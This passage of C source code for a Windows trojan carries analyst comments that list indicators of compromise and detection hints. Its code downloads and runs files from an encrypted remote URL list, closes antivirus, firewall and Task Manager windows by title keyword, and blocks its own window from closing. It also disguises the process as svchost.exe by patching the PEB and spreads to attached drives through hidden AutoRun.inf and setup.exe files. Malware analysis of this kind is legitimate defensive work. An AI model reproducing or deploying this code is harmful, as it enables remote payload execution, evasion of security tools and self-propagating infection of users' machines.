if (hInternet != NULL)
{
hUrlHandle = InternetOpenUrl(hInternet, Url, NULL, 0, 0x04000000, 0);
if (hUrlHandle!= NULL)
{
memset(buf,0,100);
InternetReadFile(hUrlHandle, buf,8, &dwSize);//先读取日期
do
{
memset(buf,0,100);
if (!InternetReadFile(hUrlHandle, buf,100, &dwSize))
{
break;
}
if (!dwSize)
break; // Condition of dwSize=0 indicate EOF. Stop.
else
{
memset(test,0,101);
DecryptRecord(buf,dwSize,"1314");
if(strstr(buf,"|")!=NULL)
{
strncpy(test,buf,strcspn(buf,"|"));
}
else
{
strncpy(test,buf,100);
}
//MessageBox(NULL,test,NULL,MB_OK);
DownExec(test);
}
Sleep(1000);
}while (TRUE);
InternetCloseHandle(hUrlHandle);
hUrlHandle = NULL;
}
InternetCloseHandle(hInternet);
hInternet = NULL;
}
FreeLibrary(hDll);
}
}
// Download-and-execute stage: fetches `url` to a fixed local path and launches it.
// Analyst notes (all taken from the code below):
//   - ShellExecuteA and URLDownloadToFileA are resolved at run time with
//     GetProcAddress, so neither appears in the binary's import table; hunt for
//     the literal strings "ShellExecuteA" / "URLDownloadToFileA" / "urlmon.dll" instead.
//   - The drop path is hard-coded: c:\pagefile.pif (named to blend in with the
//     Windows page file; .pif is launched like an executable). That path is a
//     usable host IOC.
//   - Neither GetProcAddress result nor the download's return value is checked:
//     a failed lookup is called through an unchecked pointer, and a failed
//     download still tries to run whatever is at c:\pagefile.pif.
//   - `url` is a decrypted, attacker-controlled string supplied by the caller
//     (see the WM_TIMER / DownFiles path elsewhere in this file); nothing here
//     validates it.
void DownExec(char url[])
{
HMODULE hshell,hurlmon;
hshell=LoadLibrary("Shell32.dll");
hurlmon=LoadLibrary("urlmon.dll");
HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );
// Function-pointer type for ShellExecuteA, resolved dynamically from shell32.dll
DWORD (WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);
// Function-pointer type for URLDownloadToFileA, resolved dynamically from urlmon.dll
(FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
(FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");
DOWNFILE(NULL,url,"c:\\pagefile.pif",0, NULL);      // return value ignored
SHELLRUN(0,"open","c:\\pagefile.pif",NULL,NULL,5);  // runs the dropped file regardless of download outcome
FreeLibrary(hshell);
FreeLibrary(hurlmon);
}
//*************************************************
//*************************************************
// Window procedure of the (hidden) message window that drives the implant.
// Behaviour visible in this block:
//   WM_CREATE      - arms two timers: #1 every 1 s (window-killer), #2 every
//                    modify_data.WaitTime minutes (update/download check).
//                    `modify_data` is defined elsewhere in the file; from the
//                    fields used here (IsAnti, IsUpan, WaitTime, DownFile) it
//                    looks like a patchable configuration block - TODO confirm.
//   WM_TIMER #1    - if IsAnti is set: destroys any window titled
//                    "Windows 任务管理器" (Windows Task Manager) and posts
//                    WM_CLOSE/WM_DESTROY to the window under the mouse cursor
//                    (and its top-level parent) whenever either title contains a
//                    keyword associated with AV / process tools / firewalls
//                    (see the strstr list below for the exact strings).
//   WM_TIMER #2    - asks GetDownFileDate() for the remote list's 8-byte date
//                    stamp; if it differs from the cached one, calls DownFiles()
//                    and caches the new stamp in %SystemDir%\DownList.ini
//                    (hidden+system via SetFileAttrib). GetDownFileDate,
//                    DownFiles, DownFileDate1/2 are defined elsewhere in the file.
//   WM_DEVICECHANGE- if IsUpan is set, hands the event to OnDeviceChange (USB spread).
//   WM_CLOSE / WM_DESTROY - swallowed (returns FALSE), so the window cannot be
//                    closed through the normal message path.
// Detection angles grounded here: a 1 Hz WindowFromPoint/GetWindowText poll,
// PostMessage(WM_DESTROY) to foreign windows, FindWindow on the Task Manager
// title, and the DownList.ini artifact in the system directory.
LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam)
{
switch(message)
{
case WM_CREATE:
SetTimer(hWnd,1,1000,NULL); // timer #1: 1 s interval (AV-window killer)
SetTimer(hWnd,2,modify_data.WaitTime*60*1000,NULL); // timer #2: WaitTime minutes (original comment says 20 min)
break;
case WM_TIMER:
{
if(wParam==1) // timer #1: close anti-virus / admin tool windows
{
if (!modify_data.IsAnti)
break;
char hstr[MAX_PATH];
char str[MAX_PATH];
POINT CurPoint;
HWND hCurrent,hParent;
GetCursorPos(&CurPoint);
hCurrent=WindowFromPoint(CurPoint); // window under the mouse cursor (may be NULL)
hParent=hCurrent;
while(GetParent(hParent)!=NULL)
hParent=GetParent(hParent); // walk up to the top-level window
// If Windows Task Manager is open, destroy it.
if(FindWindow(NULL,"Windows 任务管理器")!=NULL)
PostMessage(FindWindow(NULL,"Windows 任务管理器"),WM_DESTROY,0,0);
// hCurrent: window under the cursor; hParent: its top-level ancestor.
// NOTE(review): str/hstr are never initialised and the strstr chain below runs
// before the `&& hCurrent` check, so on a NULL hCurrent it relies on
// GetWindowText writing a terminator into the buffers.
GetWindowText(hParent,str,MAX_PATH); // quick check for AV / process-killer tool titles
GetWindowText(hCurrent,hstr,MAX_PATH); // same check for the window directly under the cursor
// Keyword list (same set applied to both titles):
//   兔子 = "Rabbit" (optimizer tool), 任务 = task, 优化 = optimize,
//   注册表 = registry, 进程 = process, 毒 = virus, 木马 = trojan,
//   天网 = "Skynet" (firewall), 防火墙 = firewall, plus the literal "Process".
if((strstr(str,"兔子") ||
strstr(str,"任务") ||
strstr(str,"优化") ||
strstr(str,"注册表") ||
strstr(str,"Process") ||
strstr(str,"进程") ||
strstr(str,"毒") ||
strstr(str,"木马") ||
strstr(str,"天网") ||
strstr(str,"防火墙") ||
strstr(hstr,"兔子")||
strstr(hstr,"任务")||
strstr(hstr,"优化")||
strstr(hstr,"注册表") ||
strstr(hstr,"Process")||
strstr(hstr,"进程")||
strstr(hstr,"毒")||
strstr(hstr,"木马")||
strstr(hstr,"天网")||
strstr(hstr,"防火墙"))
&& hCurrent)
{// posted several times "in case one slips through" (original comment)
PostMessage(hCurrent,WM_DESTROY,0,0); // destroy the window under the cursor
PostMessage(hParent,WM_CLOSE,0,0); // close its top-level parent
PostMessage(hCurrent,WM_CLOSE,0,0); // close the window under the cursor
PostMessage(hParent,WM_DESTROY,0,0); // destroy the top-level parent
}
}
else if(wParam==2) // timer #2: download the file list and run it
{
if(GetDownFileDate(modify_data.DownFile,DownFileDate2))// remote list reachable
{
if (strncmp(DownFileDate1,DownFileDate2,8)!=0)// 8-byte date stamp changed since last run
{// a new list means new payloads to fetch
DownFiles(modify_data.DownFile);
strcpy(DownFileDate1,DownFileDate2);
char DownFile[256];
::GetSystemDirectory(DownFile,sizeof(DownFile));
strcat(DownFile,"\\DownList.ini"); // persistence/state artifact: %SystemDir%\DownList.ini
FILE *fp1=fopen(DownFile,"wb");
if(fp1!=NULL)
{
fwrite(DownFileDate2,sizeof(char),8,fp1); // raw 8-byte stamp, no terminator
fclose(fp1);
SetFileAttrib(DownFile); // hidden + system
}
}
}
}
}
break;
case WM_DEVICECHANGE:// USB / volume arrival notifications
if(modify_data.IsUpan)
OnDeviceChange(hWnd,wParam,lParam);
break;
case WM_CLOSE:
return FALSE; // refuse to close
case WM_DESTROY:
return FALSE; // refuse to be destroyed
default:
return DefWindowProc(hWnd,message,wParam,lParam);
}
return 0;
}
//------------ Disguise this process as svchost.exe by patching PEB strings ----------
// Rewrites the process's own PEB strings so that tools which read them see
// "<SystemDir>\svchost.exe" instead of the real image path. 32-bit only:
// `__asm` with fs:[30h] is the x86 PEB (on x64 the PEB is at gs:[60h] and
// MSVC has no inline asm).
// What the code does, in order:
//   1. builds "<SystemDir>\svchost.exe" in szpath (64 bytes, no length check
//      on GetSystemDirectory + strcat);
//   2. widens it byte-by-byte into a *static* 128-byte buffer. All 64 source
//      bytes are copied, including whatever uninitialised stack bytes follow
//      the terminator, so the wide string carries trailing garbage;
//   3. points three UNICODE_STRING-style (Length, Buffer) pairs at that buffer
//      and hard-codes each Length to 0x60 (96 bytes = 48 wide chars), which is
//      not derived from the real string length.
// The comments in the asm name ImagePathName and CommandLine under
// ProcessParameters (PEB+0x10). The first group (PEB+0xC -> +0xC, then
// +0x24/+0x28) is not commented; it looks like Ldr -> first loader-list entry
// and its FullDllName - TODO confirm offsets against the target OS version.
// The buffer is static because the PEB keeps pointing at it after this
// function returns; a stack buffer would dangle (that answers the "why?").
// Detection: the on-disk image and kernel-side process name are untouched, so
// comparing the PEB ImagePathName/CommandLine with the actually mapped image
// (or the path returned by a kernel query) exposes the mismatch.
void ByPassFireWall()
{
char szpath[64];
static char modulepath[128];// must outlive this call: the PEB points into it after return
GetSystemDirectory(szpath,64);
strcat(szpath,"\\svchost.exe");
// Widen to UTF-16 (naive byte -> wchar, copies all 64 bytes of szpath)
for (int i=0;i<64;i++)
{
modulepath[i*2] = szpath[i];
modulepath[i*2+1] = 0;
}
__asm
{
MOV EAX, fs:[30h]          // PEB (x86)
MOV EAX, [EAX+0xC]         // PEB+0xC  (presumably Ldr)
MOV EAX, [EAX+0xC]         // first list entry (presumably own module)
lea ebx,modulepath
mov WORD ptr[EAX+0x24],0x60 // Length hard-coded to 0x60
mov [EAX+0x28],ebx         // Buffer -> modulepath
MOV EAX, fs:[30h]
mov EAX,[EAX+0x10]         // PEB->ProcessParameters
lea EAX,[EAX+0x3c]
lea ebx,modulepath
mov [eax],ebx //ImagePathName->Buffer
mov WORD ptr[eax-4],0x60 //ImagePathName->Length
MOV EAX, fs:[30h]
mov EAX,[EAX+0x10] //peb->_RTL_USER_PROCESS_PARAMETERS
lea eax,[EAX+0x44] //_RTL_USER_PROCESS_PARAMETERS -> CommandLine->Buffer
lea ebx,modulepath
mov [eax],ebx //CommandLine-->Buffer
mov WORD ptr[eax-4],0x60 //CommandLine-->Length
}
}
//-------------- Begin USB-drive propagation ----------------------------
// Writes an AutoRun.inf at `path` that launches `name` through three separate
// keys (open=, shellexecute=, shell\Auto\command=), so it triggers on insert,
// on Explorer double-click and from the drive's context menu.
// Returns TRUE if the file was written, FALSE if fopen failed.
// Analyst notes:
//   - the file is opened in text mode ("w+") while the format strings already
//     end in "\r\n"; on a Windows CRT that likely yields "\r\r\n" line endings,
//     a distinctive fingerprint of this dropper's inf files - TODO confirm on
//     a sample.
//   - `name` is inserted with plain %s, no quoting or validation (callers in
//     this file pass the literal "setup.exe").
//   - This propagation vector depends on AutoRun being honoured for removable
//     media, which modern Windows no longer does by default.
BOOL CreateAutoRunFile(char*name,char *path)
{
FILE *out;
out=fopen(path,"w+");
if(out)
{
fprintf(out,"[AutoRun]\r\n");
fprintf(out,"open=%s\r\n",name);
fprintf(out,"shellexecute=%s\r\n",name);
fprintf(out,"shell\\Auto\\command=%s\r\n",name);
fclose(out);
return TRUE;
}
else
return FALSE;
}
// Maps a DEV_BROADCAST_VOLUME unit mask to the drive letter of its lowest set
// bit (bit 0 -> 'A', bit 1 -> 'B', ...). Only the first flagged drive is
// reported. If none of the low 26 bits is set the scan runs off the end and
// the result is 'A' + 26 (i.e. '['), exactly as in the original.
char FirstDriveFromMask(ULONG unitmask)
{
char bit = 0;
// Shift until bit 0 is set, or until all 26 drive positions are exhausted.
while (bit < 26 && !(unitmask & 0x1))
{
unitmask >>= 1;
++bit;
}
return (char)('A' + bit);
}
// Marks `path` hidden + system so it is not shown in default Explorer views.
// Used in this file on every dropped artifact (DownList.ini, the USB copy of
// setup.exe and AutoRun.inf). Returns the raw SetFileAttributes result.
// Triage tip: `dir /a` or `attrib` still lists such files.
BOOL SetFileAttrib(char *path)
{
return SetFileAttributes(path,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
}
// Seeds a newly attached volume with the implant.
// `U`: only U[0] (the drive letter) is read.
// Steps, all hard-coded:
//   1. source = %SystemDir%\IME\svchost.exe (the implant's resident copy; note
//      the IME subfolder, a useful host IOC alongside the real
//      %SystemDir%\svchost.exe);
//   2. writes X:\AutoRun.inf pointing at setup.exe and hides it;
//   3. copies the source to X:\setup.exe (third CopyFile argument FALSE:
//      an existing setup.exe is overwritten) and hides it.
// Returns FALSE if the copy fails, otherwise SetFileAttrib's result.
// NOTE(review): the inf is written and hidden *before* the copy, so a failed
// copy leaves a dangling AutoRun.inf on the drive.
BOOL CopyToUAndSet(char *U)
{
char This_File[256];
memset(This_File,0,sizeof(This_File));
::GetSystemDirectory(This_File,sizeof(This_File));
strcat(This_File,"\\IME\\svchost.exe");
char szPath[40];
sprintf(szPath,"%c:\\setup.exe",U[0]);// full path of the payload on the USB drive
char szAutoFile[40];
sprintf(szAutoFile,"%c:\\AutoRun.inf",U[0]);
if(CreateAutoRunFile("setup.exe",szAutoFile))
SetFileAttrib(szAutoFile);
if(!CopyFile(This_File,szPath,FALSE))
return FALSE;
return SetFileAttrib(szPath);
}
// WM_DEVICECHANGE handler for the USB-spreading path.
// On DBT_DEVICEARRIVAL of a DBT_DEVTYP_VOLUME it takes the first drive letter
// in dbcv_unitmask and calls CopyToUAndSet on it. Several drives arriving in
// one notification are not all handled - only the lowest letter is.
// Nothing here inspects dbcv_flags, so any arriving volume (not just
// removable media) is targeted; the copy simply fails on read-only media.
// DBT_DEVICEREMOVECOMPLETE is accepted and ignored. Always returns 0.
// `U` is a 4-byte buffer of which only U[0] is ever set or read.
LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam)
{
char U[4];
PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam;
switch(wParam)
{
case DBT_DEVICEARRIVAL: // device inserted
if (lpdb ->dbch_devicetype == DBT_DEVTYP_VOLUME)
{
PDEV_BROADCAST_VOLUME lpdbv = (PDEV_BROADCAST_VOLUME)lpdb;
U[0]=FirstDriveFromMask(lpdbv ->dbcv_unitmask);// drive letter of the new volume
CopyToUAndSet(U);// drop payload + AutoRun.inf onto it
}
break;
case DBT_DEVICEREMOVECOMPLETE: // device removed
break;
}
return LRESULT();
}
//-------------- End USB-drive propagation ----------------------------